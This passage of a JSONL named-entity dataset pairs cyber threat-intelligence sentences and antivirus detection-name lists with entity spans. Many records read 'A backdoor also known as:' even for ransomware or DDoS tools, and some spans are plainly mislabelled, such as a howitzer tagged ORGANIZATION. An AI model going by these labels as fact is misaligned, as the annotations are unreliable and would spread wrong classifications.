Worm.VB.Win32.26804 Trojan/VB.nup Win32.Virus.VBbind.a W32.Besverit Win32/VB.JU TROJ_DLOADR.SMM Win.Trojan.Cosmu-4 Virus.Win32.Lamer.el Win32.Worm.VB.NZQ Trojan.Win32.VB.ltch Trojan.Win32.Cosmu.887991 Worm.Win32.VB.kp Win32.Worm.VB.NZQ Win32.Worm.VB.NZQ Win32.HLLW.Autoruner.6014 TROJ_DLOADR.SMM BehavesLike.Win32.Autorun.vh Worm.Win32.VB Trojan/Cosmu.lan Win32.Worm.VB.NZQ Troj.Downloader.W32.VB.l4ji Virus.Win32.Lamer.el Win32.Worm.VB.NZQ Win32/Lamer.D Win32.Worm.VB.NZQ SIM.Trojan.VBO.0859 Win32/VB.NUP W32/AutoRun.RPV!worm W32/OverDoom.A Virus.Win32.Lamer.B", "spans": {"MALWARE: 
backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001340", "source": "cyner2_train"}} {"text": "In early 2015, FIN1 updated their toolset to include a utility that modifies the legitimate system Volume Boot Record VBR and hijacks the system boot process to begin loading Nemesis components before the Windows operating system code.", "spans": {"THREAT_ACTOR: FIN1": [[15, 19]], "VULNERABILITY: modifies": [[68, 76]], "MALWARE: Nemesis components": [[175, 193]], "SYSTEM: Windows operating system": [[205, 229]]}, "info": {"id": "cyner2_train_001341", "source": "cyner2_train"}} {"text": "A backdoor also known as: Exploit.Java.CVE20130422.crcqcf Exploit:Java/CVE-2013-0422.A heur:Exploit.CVE-2013-0422 Exploit:Java/Obfuscator.AS Trojan.Java.Downloader virus.java.bot.a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001343", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.PasistA.Worm Worm.Sfone.A3 Worm.Sform Worm.Sfone W32/Worm.BLGI W32.SillyWNSE Win32/Sfone.A BehavesLike.Win32.Trojan.ch W32/Worm.KOKR-0749 Worm:Win32/Sfone.A Worm.Sfone.A W32/WinSxsBot.A.worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001345", "source": "cyner2_train"}} {"text": "Communicates via TOR", "spans": {"SYSTEM: TOR": [[17, 20]]}, "info": {"id": "cyner2_train_001348", "source": "cyner2_train"}} {"text": "Without the use of SSL interception traditional IDS/IPS systems could cease to detect compromised systems.", "spans": {"SYSTEM: IDS/IPS systems": [[48, 63]], "SYSTEM: compromised systems.": [[86, 106]]}, "info": {"id": "cyner2_train_001350", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm.Theals W32/Theals.dam Worm.Theals.Win32.2 Win32.Trojan.WisdomEyes.16070401.9500.9975 Win32/VB.VOMRAe Win.Exploit.DCOM-5 Net-Worm.Win32.Theals.c Virus.Win32.Theals.vvbf Net.Worm.W32!c Virus.Win32.Theals_re.c Win32.Zombie.4214 BehavesLike.Win32.Virut.ch Worm/Theals.i W32/Theals.D Win32.Theals.bd.8704 
Net-Worm.Win32.Theals.c Worm/Win32.Theals.C1456665 Virus.Win32.Stealth.c W32/Theals.C!worm.im Win32/Trojan.529", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001351", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Delf.S10 Trojan.Delf.Win32.63014 Troj.W32.Bcex.tnto Win32.Trojan.Delf.ah Downloader.Ponik Win.Trojan.Delf-33216 Win32.Trojan-Dropper.FakeDoc.B Trojan.Win32.Broskod.rb Trojan.Win32.Delf.cqqvkh TrojWare.Win32.Delf.DHHK BehavesLike.Win32.AdwareDealPly.ch Worm.Win32.Takc Trojan/Win32.Unknown Worm:Win32/Takc.A Trojan.Win32.Broskod.rb Hoax.Blocker Win32.Virus.Delf.Wsjq Trojan.Delf!8gjXiSoqNjg W32/Delf.NBJ!tr Win32/Trojan.Delf.I", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001352", "source": "cyner2_train"}} {"text": "A backdoor also known as: Ransom.Apollo Ransom.Apollo Ransom_Apollo.R058C0TLR17 Win32.Trojan.WisdomEyes.16070401.9500.9925 W32/Trojan.MNOB-4766 Ransom_Apollo.R058C0TLR17 Win32.Trojan-Ransom.ApolloLocker.A Trojan.Win32.Crypted.ewmuiu W32.Troj.Ransom!c Ransom.Win32.Apollo Ransom:Win32/Apollo.A Trj/CI.A Win32/Trojan.160", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001354", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.JobLaunch.ODB Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Memsyl TROJ_NECURS.SMJ10 Trojan.Win32.Crypted.dgzzxe Trojan.DownLoader11.38598 TROJ_NECURS.SMJ10 W32/Trojan.TVCC-2701 TrojanDropper.Injector.atzu Trojan.Zusy.D1B5A0 Dropper/Win32.Necurs.R121870 TrojanDropper.Injector Trojan.MSIL.Inject MSIL/Injector.FWI!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001355", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.C675 Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Trojan2.IUJL SecurityRisk.Downldr Trojan.DownLoad.42343 W32.Malware.Downloader Trojan.Kelios.1 TScope.Malware-Cryptor.SB Trojan.Win32.Dogrobot", "spans": {"MALWARE: backdoor": [[2, 10]]}, 
"info": {"id": "cyner2_train_001356", "source": "cyner2_train"}} {"text": "Initial research identified that the filename suggested a relationship to the D-30 122mm towed howitzer, an artillery weapon first manufactured in the Soviet Union in the 1960s but still in use today.", "spans": {"ORGANIZATION: the D-30 122mm towed howitzer,": [[74, 104]], "ORGANIZATION: artillery weapon": [[108, 124]]}, "info": {"id": "cyner2_train_001357", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9772 Win.Trojan.Adwind-9 W32/Trojan.YEAY-3186 W32.Dropper.Java Trj/CI.A Win32/Application.22f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001358", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.38CB Virus.Win32.Virut", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001359", "source": "cyner2_train"}} {"text": "Until now, it was widely believed the actor's activities had largely subsided in 2013, following numerous public disclosures and detailed analyses of their backdoors.", "spans": {"THREAT_ACTOR: actor's": [[38, 45]], "MALWARE: backdoors.": [[156, 166]]}, "info": {"id": "cyner2_train_001361", "source": "cyner2_train"}} {"text": "Surprisingly, there is a lot of media attention going on at the moment on a macOS malware called OSX/Dok.", "spans": {"SYSTEM: macOS": [[76, 81]], "MALWARE: malware": [[82, 89]], "MALWARE: OSX/Dok.": [[97, 105]]}, "info": {"id": "cyner2_train_001362", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Symmi.DEFF7 W32.Extrat Win.Trojan.B-471 BackDoor.Cybergate.4022 BehavesLike.Win32.Backdoor.gc Troj.W32.Scar.lByG Trojan.Win32.Xtrat.ldu Backdoor/Win32.Poison.R139029 Trojan.Xtrat Trojan.Win32.Remtasu", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001363", "source": "cyner2_train"}} {"text": "The Trojan may send the following information to one of the remote locations: Computer name", 
"spans": {"MALWARE: Trojan": [[4, 10]]}, "info": {"id": "cyner2_train_001365", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.DoS.751104 DoS.Win32.Delf!O Trojan/DOS.Delf.j DoS.Delf!7331ealGHQM W32/Worm.ATZ Hacktool.Flooder TROJ_DELF.FOE DoS.Delf DoS.Win32.Delf.j Trojan.Win32.Delf.hdtu PE:Hack.DDoSer.Win32.Delf.j!1074949418 Tool.Delf.Win32.630 TROJ_DELF.FOE BehavesLike.Win32.Trojan.bh W32/Worm.OXOE-7458 Trojan/DDoS.Delf.f DDOS/Delf.J.4 HackTool[DoS]/Win32.Delf Win32.Hack.Delf.j.kcloud Trojan.Win32.Dos-Delf.626688[h] Win-Trojan/Xema.variant DoS.Delf Trojan.Win32.Delf.j Win32.Trojan.Delf.brp Trojan-Dropper.Delf W32/Delf.A!tr DoS.BRY Win32/Trojan.2ff", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001367", "source": "cyner2_train"}} {"text": "In the months leading up to August, the Sofacy group launched several waves of attacks relying on zero-day exploits in Microsoft Office, Oracle Sun Java, Adobe Flash Player and Windows itself.", "spans": {"THREAT_ACTOR: Sofacy group": [[40, 52]], "VULNERABILITY: zero-day exploits": [[98, 115]], "SYSTEM: Microsoft Office, Oracle Sun Java, Adobe Flash Player": [[119, 172]], "SYSTEM: Windows": [[177, 184]]}, "info": {"id": "cyner2_train_001368", "source": "cyner2_train"}} {"text": "A new variant of the notorious ransomware Petya is back - again - and with yet another James Bond reference for a name: Goldeneye.", "spans": {"MALWARE: new variant": [[2, 13]], "MALWARE: ransomware Petya": [[31, 47]], "MALWARE: Goldeneye.": [[120, 130]]}, "info": {"id": "cyner2_train_001369", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9996 Trojan.Cridex Trojan.Win64.Kryptik.exmlew Trojan.Win32.Z.Mikey.577536.K Trojan.Kryptik.Win64.1541 Trojan.Win64.Crypt W64/Trojan.WNTM-1890 TR/Crypt.ZPACK.fzarm Trojan/Win64.Dridex Trojan.Mikey.D123A2 Backdoor.NanoCore Trj/CI.A Win32.Trojan.Mikey.Szbg Win32/Trojan.4d2", "spans": {"MALWARE: backdoor": [[2, 10]]}, 
"info": {"id": "cyner2_train_001371", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.PePatch.Win32.108052 Trojan.Razy.D2AD35 Win32.Trojan.WisdomEyes.16070401.9500.9515 Trojan.Win32.Wencho.eqsozv Backdoor.Win32.Wencho Backdoor:Win32/Wencho.A Downloader/Win32.Paph.C1961981 TrojanDownloader.Paph Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001373", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Exploit/W32.IMG-WMF.23552.O Trojan-GameThief.Win32.OnLineGames!O Exploit.IMG.Win32.498 Trojan/Exploit.IMG-WMF.axd TROJ_BEHAV.FL Win32.Trojan.WisdomEyes.16070401.9500.9981 TROJ_BEHAV.FL Win.Trojan.Exploit-289 Exploit.Win32.IMGWMF.bekdjb Exploit.W32.IMG-WMF.loBk TrojWare.Win32.GameThief.Magania.~EV Trojan.DownLoad.15186 BehavesLike.Win32.Worm.mc Exploit.IMG-WMF.agp Rootkit.Small Trojan.Win32.KillAv.hd Exploit.Win32.IMG-WMF Win32/Trojan.Exploit.a54", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001374", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Delf Trojan.Heur.iO0au4aNrMf Win32.Trojan.WisdomEyes.16070401.9500.9705 W32/Trojan.UNZI-1320 W32.Datom.Worm Trojan.Win32.Delf.enaz Trojan.Win32.Datom.euwmlv Worm.Win32.Datom.A~1 Win32.HLLW.Datom BehavesLike.Win32.Sality.cc Virus.Worm.Datom Trojan.Win32.Delf.enaz Trojan/Win32.Buzus.C104859 Trojan.Delf Win32.Trojan.Delf.Swlf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001376", "source": "cyner2_train"}} {"text": "SANS has published a new blog regarding a tax filing service that has been compromised.", "spans": {"ORGANIZATION: SANS": [[0, 4]], "SYSTEM: a tax filing service": [[40, 60]], "VULNERABILITY: compromised.": [[75, 87]]}, "info": {"id": "cyner2_train_001379", "source": "cyner2_train"}} {"text": "A backdoor also known as: Application.NirSoft.PSPassView.C PSWTool.Win32.PassView!O HackTool.Pspv.SD4 W32/PWS.IMQI-4038 Hacktool.PStorRevealer 
Application.NirSoft.PSPassView.C not-a-virus:PSWTool.Win32.PassView.iv Application.NirSoft.PSPassView.C Riskware.Win32.PassView.exmcew Application.NirSoft.PSPassView.C ApplicUnsaf.Win32.PSWTool.PassView.A Tool.PassView Tool.PassView.Win32.6 W32/PWStealer.CAT PSWTool.PassView.k Trojan[PSWTool]/Win32.PassView Application.NirSoft.PSPassView.C not-a-virus:PSWTool.Win32.PassView.iv TScope.Malware-Cryptor.SB PUP.Optional.PassView Trj/CI.A HackTool.IcqSmiley.A not-a-virus:PSWTool.Win32.PassView Win32/Application.40e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001380", "source": "cyner2_train"}} {"text": "Unit 42 recently identified a targeted attack against an individual working for the Foreign Ministry of Afghanistan in China.", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "ORGANIZATION: individual working": [[57, 75]], "ORGANIZATION: the Foreign Ministry of Afghanistan": [[80, 115]]}, "info": {"id": "cyner2_train_001381", "source": "cyner2_train"}} {"text": "This threat targets Russians but the apps are accessible worldwide.", "spans": {"MALWARE: threat": [[5, 11]], "SYSTEM: apps": [[37, 41]]}, "info": {"id": "cyner2_train_001383", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Qhost.Win32.10597 Trojan/Qhost.pdq Trojan.Zusy.D5AFC Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Hosts.bgaqwt Troj.Banker.W32.Qhost.lE9S Trojan.Hosts.5268 Trojan.Win32.Hider Trojan/Win32.Unknown Trojan:WinNT/QHosts.B Win32/Qhost.PDQ Trojan.Qhost!QXppfUGnhzI W32/Kryptic.QHS!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001384", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Spymel.A4 Trojan.ReconycCRTD.Win32.8402 Trojan.Zusy.D1E1BE Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Reconyc.inec Trojan.DownLoader13.49710 Trojan/Win32.Reconyc Backdoor:MSIL/Moidirat.A Trojan.Win32.Reconyc.inec Trojan.MSIL.Spy Win32/Backdoor.a11", "spans": {"MALWARE: backdoor": [[2, 10]]}, 
"info": {"id": "cyner2_train_001385", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Nymaim.561152 Trojan.NymaimCS.S1199370 TROJ_NYMAIM.SMR2 Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_NYMAIM.SMR2 Trojan.Win32.Nymaim.eqlfnf TrojWare.Win32.Nymaim.CH Trojan.Nymaim.143 BehavesLike.Win32.MultiPlug.hh Trojan-Downloader.Nymaim Trojan.Nymaim.czv TR/Crypt.Xpack.owrka Trojan/Win32.Nymaim Win32.Trojan.Nymaim.M Trojan/Win32.Nymaim.C2027429 Trojan.Nymaim Trojan.Nymaim Win32/TrojanDownloader.Nymaim.BA Trojan.Nymaim!ovdfLq+hmM4 W32/Nymaim.BA!tr Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001386", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Java.Downloader.1096 BehavesLike.Win32.Trojan.vc Java.Obfus", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001389", "source": "cyner2_train"}} {"text": "Microsoft Publisher is included and installed by default in Office 365.", "spans": {"ORGANIZATION: Microsoft Publisher": [[0, 19]], "SYSTEM: Office 365.": [[60, 71]]}, "info": {"id": "cyner2_train_001391", "source": "cyner2_train"}} {"text": "Kaspersky Lab began this ongoing research in the autumn of 2011.", "spans": {"ORGANIZATION: Kaspersky Lab": [[0, 13]], "ORGANIZATION: research": [[33, 41]]}, "info": {"id": "cyner2_train_001392", "source": "cyner2_train"}} {"text": "In this post we will review the research results of Votiro Labs and ClearSky, the weaponized documents and campaign infrastructure.", "spans": {"ORGANIZATION: Votiro Labs": [[52, 63]], "ORGANIZATION: ClearSky,": [[68, 77]], "SYSTEM: campaign infrastructure.": [[107, 131]]}, "info": {"id": "cyner2_train_001393", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Heur.TP.ED1233C Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.Win32.Z.Starter.204271 Trojan.Win32.Starter Exploit.ShellCode Trojan:Win32/Starter.P Trojan.Win32.Starter Trj/CI.A 
Win32.Trojan.Crypt.Dzkb Win32/Trojan.6f7", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001395", "source": "cyner2_train"}} {"text": "DustySky called NeD Worm by its developer is a multi-stage malware in use since May 2015.", "spans": {"MALWARE: DustySky": [[0, 8]], "MALWARE: NeD Worm": [[16, 24]], "THREAT_ACTOR: developer": [[32, 41]], "MALWARE: multi-stage malware": [[47, 66]]}, "info": {"id": "cyner2_train_001396", "source": "cyner2_train"}} {"text": "When a user opens the .zip file and double clicks the JavaScript, the default browser Internet Explorer, Mozilla, etc. opens and executes JavaScript.", "spans": {"ORGANIZATION: user": [[7, 11]], "SYSTEM: Internet Explorer, Mozilla,": [[86, 113]]}, "info": {"id": "cyner2_train_001397", "source": "cyner2_train"}} {"text": "We have identified a new distribution campaign which took place on 4th July.", "spans": {"THREAT_ACTOR: distribution campaign": [[25, 46]]}, "info": {"id": "cyner2_train_001398", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Minxer Win32.Trojan.WisdomEyes.16070401.9500.9994 W32/Trojan.CFWS-6788 Win32.Application.Bitcoinminer.W Riskware.Win64.BtcMine.eiegeg Trojan.BtcMine.604 Worm.WBNA.Win32.419008 W32.Trojan.Minxer Trojan.Razy.D197C7 Trojan.BitCoinMiner Trj/CI.A Riskware.BitCoinMiner! 
Win32/Trojan.582", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001399", "source": "cyner2_train"}} {"text": "Linux.Rekoobe variant", "spans": {"MALWARE: variant": [[14, 21]]}, "info": {"id": "cyner2_train_001400", "source": "cyner2_train"}} {"text": "Sex sells, and nowhere is that more true than the Chinese mobile landscape.", "spans": {}, "info": {"id": "cyner2_train_001401", "source": "cyner2_train"}} {"text": "BAIJIU's goal in this attack was to deploy a set of espionage tools through a downloader we call TYPHOON and a set of backdoors we call LIONROCK.", "spans": {"THREAT_ACTOR: BAIJIU's": [[0, 8]], "MALWARE: espionage tools": [[52, 67]], "MALWARE: downloader": [[78, 88]], "MALWARE: TYPHOON": [[97, 104]], "MALWARE: backdoors": [[118, 127]], "MALWARE: LIONROCK.": [[136, 145]]}, "info": {"id": "cyner2_train_001402", "source": "cyner2_train"}} {"text": "Adding AV exceptions", "spans": {"SYSTEM: AV": [[7, 9]]}, "info": {"id": "cyner2_train_001403", "source": "cyner2_train"}} {"text": "The first one is used to receive a list of logins and passwords, the second one—for operation of the SOCKS proxy server.", "spans": {"SYSTEM: the SOCKS proxy server.": [[97, 120]]}, "info": {"id": "cyner2_train_001404", "source": "cyner2_train"}} {"text": "Variants of H-Worm, primarily connecting to command and control servers located in Algeria.", "spans": {"MALWARE: Variants": [[0, 8]], "MALWARE: H-Worm,": [[12, 19]]}, "info": {"id": "cyner2_train_001405", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.ShipUp.90112 W32.VisuDir.A3 Trojan.Zusy.D2CF33 PE_SHIPUP.A Win32.Worm.ShipUp.h Win32/Gamarue.ISACBfC PE_SHIPUP.A Trojan.Win32.ShipUp.futk TrojWare.Win32.ShipUp.AR Trojan.KillFiles.28137 Worm.Win32.ShipUp Worm:Win32/Lecna.A!dha Trojan.Win32.ShipUp.futk Trojan/Win32.Cossta.R120893 Trojan.FakeDoc Trojan.Win32.Csyr.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001406", "source": "cyner2_train"}} {"text": 
"The malicious macro inside the Office document is obfuscated as shown in the code snapshot below -Recently [Kaspersky] came across a new family of cross-platform backdoors for desktop environments.", "spans": {"VULNERABILITY: malicious macro": [[4, 19]], "MALWARE: code snapshot": [[77, 90]], "ORGANIZATION: [Kaspersky]": [[107, 118]], "MALWARE: family of cross-platform backdoors": [[137, 171]], "SYSTEM: desktop": [[176, 183]], "SYSTEM: environments.": [[184, 197]]}, "info": {"id": "cyner2_train_001408", "source": "cyner2_train"}} {"text": "Typhon is an info stealer first that was reported in mid-2022 for the first time.", "spans": {"MALWARE: Typhon": [[0, 6]], "MALWARE: stealer": [[18, 25]]}, "info": {"id": "cyner2_train_001410", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Zenshirsh.SL7 Trojan.Win32.Pigeon.cxszod Uds.Dangerousobject.Multi!c Win32.Trojan.Mikey.Swlc BackDoor.Pigeon.8805 Backdoor.Hupigon.Win32.185096 Trojan.Mikey.D9181 HackTool:Win32/Goldoseri.A Win32/HackTool.DoSer.AE BackDoor.Pigeon! 
Win32/Trojan.6bf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001411", "source": "cyner2_train"}} {"text": "On July 6, 2017, RSA FirstWatch noted renewed MONSOON APT campaign activity submitted from a community user in India to Virus Total.", "spans": {"ORGANIZATION: RSA FirstWatch": [[17, 31]], "THREAT_ACTOR: MONSOON APT campaign": [[46, 66]], "ORGANIZATION: community user": [[93, 107]], "ORGANIZATION: Virus Total.": [[120, 132]]}, "info": {"id": "cyner2_train_001412", "source": "cyner2_train"}} {"text": "A backdoor also known as: RDN/BackDoor-AWQ.b Heur.Corrupt.PE Backdoor.Win32.Hupigon TrojanDropper:Win32/Arbinder.B.dam#2 Backdoor/Win32.Graybird.C194482", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001413", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Zenshirsh.SL7 Hacktool.Flooder BehavesLike.Win32.RAHack.xc Trojan-DDoS.Win32.Resod TrojanDDoS.Resod.g TR/DDoS.Maker.11.B Trojan[DDoS]/Win32.Resod DDoS:Win32/Resod.dam#2 Win32/Trojan.DDoS.835", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001415", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Wurmark.A@mm Win32.Wurmark.A@mm W32/Mugly.h@MM W32.W.Wurmark.g!c W32/Wurmark.g Win32.Wurmark.A@mm Win32.Wurmark.E90817 I-Worm.Wurmark!utsCc3R91ZU W32/Wurmark.F W32.Mugly.G@mm Win32/Wurmark.G WORM_MUGLY.H Worm.Wurmark.G Email-Worm.Win32.Wurmark.g Trojan.Win32.Wurmark.fsml Virus.Win32.Heur.c Win32.Wurmark.A@mm Worm.Win32.Wurmark.G Win32.Wurmark.A@mm Worm.Wurmark.Win32.11 WORM_MUGLY.H BehavesLike.Win32.VBObfus.fc W32/Wurmark.JPAN-1543 I-Worm.Wurmark.a WORM/Uglatad.2 Worm[Email]/Win32.Wurmark Worm:Win32/Mugly.H@mm Win32/Mugly.worm.351744 Win32.Wurmark.A@mm Win32/Mugly.G Worm.Wurmark Win32.Wurmark.A@mm Virus.Win32.QQRob.AS W32/Mugly.H@mm I-Worm/Wurmark.E Worm.Win32.Wurmark.AGmW", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001418", "source": "cyner2_train"}} {"text": 
"Darkhotel APT attacks dated 2014 and earlier are characterized by the misuse of stolen certificates, the deployment of .hta files with multiple techniques, and the use of unusual methods like the infiltration of hotel Wi-Fi to place backdoors in targets' systems.", "spans": {"THREAT_ACTOR: Darkhotel APT": [[0, 13]], "MALWARE: backdoors": [[233, 242]], "SYSTEM: targets' systems.": [[246, 263]]}, "info": {"id": "cyner2_train_001420", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Symmi.D11236 Win32.Trojan.WisdomEyes.16070401.9500.9993 DLOADER.Trojan Trojan-Downloader.Win32.Small Trojan/Win32.Rozepads.R172444 BScope.Trojan.Win32.Inject.2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001421", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor/W32.Androm.1289728 Trojan.Skeeyah Backdoor.Bot Win32.Trojan.WisdomEyes.16070401.9500.9989 W32/Trojan.UWVT-1669 W32.Golroted TROJ_INJECTOR_FE31022B.UVPM Backdoor.Win32.Androm.hjzg Trojan.PWS.Stealer.13025 TROJ_INJECTOR_FE31022B.UVPM BehavesLike.Win32.Trojan.tc W32/Trojan2.PTAY Backdoor/Androm.gyi Trojan[Backdoor]/Win32.Androm Trojan.MSIL.Androm.9 Backdoor.Win32.Androm.hjzg Trojan:MSIL/Loksec.A Trojan/Win32.Inject.R140951 Backdoor.Androm Trojan.Injector Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001423", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/Dropper.Delf.bl TROJ_DROPPER.IPJ W32/Risk.CLFC-1497 Backdoor.Acropolis TrojanDropper.Delf TROJ_DROPPER.IPJ Win.Trojan.Acropolis-1 Trojan-Dropper.Win32.Delf.bl Trojan.Win32.Delf.ffej Dropper.Delf.972288 Troj.Dropper.W32.Delf.bl!c TrojWare.Win32.TrojanDropper.Delf.BL BackDoor.Acropolis.10 Dropper.Delf.Win32.1638 Trojan-Dropper.Win32.Delf W32/Dropper.HL TrojanDropper.Delf.cj W32.Trojan.Dropper-Tetris BDS/Acropolis.3 Trojan[Dropper]/Win32.Delf Win32.Troj.Delf.bl.kcloud Backdoor:Win32/Tetris.A Trojan.Graftor.D2B929 Trojan-Dropper.Win32.Delf.bl 
Win32/TrojanDropper.Delf.BL Win32.Trojan-dropper.Delf.Efao TrojanDropper.Delf!n6JtRIRZLjo W32/Acrop.A!tr.bdr Win32/Trojan.Dropper.605", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001424", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FamVT.ExpiroPC.PE Backdoor.Win32.Nucleroot!O Win32.Trojan.WisdomEyes.16070401.9500.9750 Adware.Lop Win32/Talpalk.C Win.Trojan.Maha-2 Backdoor.Win32.Nucleroot.c Trojan.Win32.Maha.gubp Packer.W32.PePatch.l5Ml Packed.Win32.Klone.~KE Trojan.Maya BehavesLike.Win32.Ipamor.ch Trojan-Dropper.Delf Backdoor/Nucleroot.fk Trojan[PSW]/Win32.Maha Backdoor.Win32.A.Nucleroot.130560 Backdoor.Win32.Nucleroot.c PWS:Win32/Bividon.A Backdoor.Nucleroot W32/Nucleroot.C!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001425", "source": "cyner2_train"}} {"text": "Security researchers have identified and identified a new type of malware, which they believe is being developed by threat actors operating from North, East and South-East Asia, and is capable of being fully undetectable.", "spans": {"ORGANIZATION: Security researchers": [[0, 20]], "MALWARE: malware,": [[66, 74]], "THREAT_ACTOR: threat actors": [[116, 129]]}, "info": {"id": "cyner2_train_001427", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.Zbot Backdoor.Win32.DarkKomet.zvj Trojan.Win32.DarkKomet.dklzqc Trojan-Dropper.Win32.Injector Trojan[Backdoor]/Win32.DarkKomet Trojan.MSIL.Krypt.3 Backdoor.Win32.DarkKomet.zvj PWS:MSIL/Skonpri.A Backdoor/Win32.DarkKomet.R90638 Backdoor.DarkKomet Trj/CI.A Trojan.Krypt!XrXGvmn0xR4 W32/DarkKomet.FZ!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001428", "source": "cyner2_train"}} {"text": "The main goal of the xDedic forum is to facilitate the buying and selling of credentials for hacked servers which are available through RDP.", "spans": {"THREAT_ACTOR: xDedic forum": [[21, 33]], "SYSTEM: 
hacked servers": [[93, 107]], "SYSTEM: RDP.": [[136, 140]]}, "info": {"id": "cyner2_train_001429", "source": "cyner2_train"}} {"text": "This report is the first to detail the attack against strategic US interests to China.", "spans": {}, "info": {"id": "cyner2_train_001430", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Archbomb.ZIP Trojan-ArcBomb.ZIP.Bubl.b Trojan.Zip.Arch-Bomb.yngkq BehavesLike.Win32.Trojan.dh Trojan.Archbomb BOMB/ArcBomb.O Trojan-ArcBomb.ZIP.Bubl.b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001431", "source": "cyner2_train"}} {"text": "The abuse of shortcut LNK files is steadily gaining traction among cybercriminals.", "spans": {"THREAT_ACTOR: cybercriminals.": [[67, 82]]}, "info": {"id": "cyner2_train_001433", "source": "cyner2_train"}} {"text": "Initially, we've called it Matrix Banker based on its command and control C2 login panel, but it seems that Matrix Admin is a template available for the Bootstrap web framework.", "spans": {"MALWARE: Matrix Banker": [[27, 40]], "SYSTEM: the Bootstrap web framework.": [[149, 177]]}, "info": {"id": "cyner2_train_001434", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32/Shuq.B W32/Shuq.g I-Worm.Shuq!TBLjXfxv+A8 W32.SillyFDC Win32/Shuq.NAA TROJ_ANGEL.F Worm.Shuq.B Email-Worm.Win32.Shuq.g Trojan.Win32.Shuq.epjd Trojan.Win32.S.HDC.66048[h] W32.W.Shuq.g!c Backdoor.Win32.Shuq.NAA BackDoor.HSV.1013 Worm.Shuq.Win32.5 TROJ_ANGEL.F W32/Risk.OPXF-7688 Worm/Sramota.aws W32/ANGEL.G@mm Worm[Email]/Win32.Shuq 